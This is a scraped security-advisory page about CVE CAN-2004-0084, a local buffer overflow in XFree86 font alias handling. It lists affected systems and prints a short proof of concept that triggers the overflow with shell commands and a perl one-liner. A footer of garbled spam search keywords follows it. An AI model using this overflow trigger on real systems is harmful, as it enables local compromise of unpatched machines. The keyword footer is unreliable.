exploits , vulnerabilities , articles , XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability
| Title |
XFree86 CopyISOLatin1Lowered Font_Name Buffer Overflow Vulnerability |
| Published |
2004-02-12-12:00AM |
| Updated |
2005-05-14-07:34PM |
| Class |
Boundary Condition Error |
| CVE |
CAN-2004-0084 |
| Remote |
No |
| Local |
Yes |
| Credit |
Discovery is credited to Greg MacManus. |
| Vulnerable |
XFree86 X11R6 4.3 .0.1
XFree86 X11R6 4.3 .0
MandrakeSoft Corporate Server 3.0
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Linux Mandrake 9.1
MandrakeSoft Linux Mandrake 9.1 ppc
MandrakeSoft Linux Mandrake 9.2
MandrakeSoft Linux Mandrake 9.2 amd64
MandrakeSoft Linux Mandrake 10.0
MandrakeSoft Linux Mandrake 10.0 amd64
RedHat Fedora Core1
RedHat Linux 9.0 i386
Slackware Linux current
Slackware Linux 9.0
Slackware Linux 9.1
Turbolinux Turbolinux Desktop 10.0
Ubuntu Ubuntu Linux 4.1 ia32
Ubuntu Ubuntu Linux 4.1 ia64
Ubuntu Ubuntu Linux 4.1 ppc
XFree86 X11R6 4.2.1 Errata
XFree86 X11R6 4.2.1
Immunix Immunix OS 7.3
MandrakeSoft Corporate Server 2.1
MandrakeSoft Corporate Server 2.1 x86_64
MandrakeSoft Linux Mandrake 9.0
RedHat Linux 7.3
Slackware Linux 8.1
XFree86 X11R6 4.2 .0
Conectiva Linux Enterprise Edition 1.0
S.u.S.E. Linux 8.0
S.u.S.E. Linux 8.0 i386
Turbolinux Turbolinux Server 8.0
Turbolinux Turbolinux Workstation 8.0
XFree86 X11R6 4.1 .0
Debian Linux 3.0
Debian Linux 3.0 alpha
Debian Linux 3.0 arm
Debian Linux 3.0 hppa
Debian Linux 3.0 ia32
Debian Linux 3.0 ia64
Debian Linux 3.0 m68k
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 sparc
RedHat Advanced Workstation for the Itanium Processor 2.1
RedHat Enterprise Linux AS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Enterprise Linux WS 2.1
RedHat Linux 7.1 i386
RedHat Linux 7.2 i386
Turbolinux Turbolinux Server 7.0
Turbolinux Turbolinux Workstation 7.0
XFree86 X11R6 4.1 12
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1.1
XFree86 X11R6 4.1 11
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1.1
Sun Solaris 9.0 _x86
Sun Solaris 9.0
Sun Solaris 8.0 _x86
Sun Solaris 8.0
Sun Solaris 7.0 _x86
Sun Solaris 7.0
SGI ProPack 2.4
SGI ProPack 2.3
SCO Unixware 7.1.3
SCO Open UNIX 8.0
OpenBSD OpenBSD 3.4
OpenBSD OpenBSD 3.3
HP HPUX 11.23
HP HPUX 11.22
HP HPUX 11.11
HP HPUX 11.0 4
HP HPUX 11.0
Avaya Interactive Response 1.3
Avaya Interactive Response 1.2.1
Avaya Interactive Response
Avaya CMS Server 12.0
Avaya CMS Server 11.0
Avaya CMS Server 9.0 |
| Not Vulnerable |
XFree86 X11R6 4.3 .0.2 |
| Code |
The following proof of concept has been supplied:
# cat > fonts.dir <<EOF 1 word.bdf -misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1 EOF # perl -e 'print "data " . "0" x 2048 . "A" x 96 . "
"' > fonts.alias # X :0 -fp $PWD
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 04:03:36 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
MMNBMJ t678t linux 2.4. Windows sq crc32 Www:sarah 200 /compo 200 /compo allmyguest t373t hayk ladyboy se www.blue10 Karishma k Nacked mod php-nuke+2 Tamil pf.C proftpd 2. telecharge download s www.amsgjs tel Www.Sex.Ch 200 /compo Sexy.girl. +porxy Old moms Www89.sexc 06040 www.office www.hsqclg mambo Remo FREE sex p MS06-35 angelia jo JPortal open woman www.jianba ventrilo dogirls butt news for c PHP Advanc 9090193708 No.4 www.top114 *** vido Www.Sex89v json CMS is Fre
|